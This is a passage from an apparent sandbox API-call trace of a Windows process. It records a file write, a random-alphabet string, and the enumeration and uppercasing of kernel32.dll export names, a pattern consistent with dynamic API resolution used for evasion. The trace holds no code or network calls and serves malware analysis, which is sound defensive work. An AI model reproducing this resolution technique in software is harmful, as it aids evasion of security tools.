dwFreeType=0x8000) returned 1 [0087.141] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.141] CloseHandle (hObject=0x414) returned 1 [0087.141] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.141] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.142] CloseHandle (hObject=0x0) returned 0 [0087.142] CloseHandle (hObject=0x410) returned 1 [0087.142] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.142] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.143] GetTickCount () returned 0x114e3bb [0087.143] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.143] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.143] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.143] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.143] lstrlenA (lpString="kernel32.dll") returned 12 [0087.143] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.144] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.144] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.144] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.144] lstrlenA (lpString="ADDATOMA") returned 8 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.144] lstrlenA (lpString="ADDATOMW") returned 8 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.144] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.144] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.144] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.144] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.144] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.144] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.144] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.144] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.144] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.144] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.144] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.144] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.144] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.145] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.145] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.145] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.145] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.145] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.145] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.145] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.145] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.145] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.145] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.145] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.145] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.145] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.145] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.145] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.145] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.145] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.146] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.146] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.146] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.146] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.146] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.146] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.146] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.146] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.146] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.146] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.146] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.146] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.146] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.146] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.146] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.146] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.146] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.146] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.147] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.147] lstrlenA (lpString="BEEP") returned 4 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.147] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.147] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.147] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.147] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.147] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.147] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.147] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.147] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.147] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.147] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.147] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.147] lstrlenA (lpString="CANCELIO") returned 8 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.147] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.147] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.147] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.147] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.148] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.148] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.148] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.148] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.148] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.148] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.148] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.148] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.148] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.148] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.148] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.148] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.148] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.148] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.148] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.148] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.148] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.148] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.149] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.149] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.149] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.149] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.149] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.149] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.149] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.149] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.149] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.149] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.149] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.149] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.149] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.149] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.149] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.149] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.149] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.149] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.149] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.150] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.150] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.150] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.150] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.150] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.150] lstrlenA (lpString="COPYFILEA") returned 9 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.150] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.150] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.150] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | 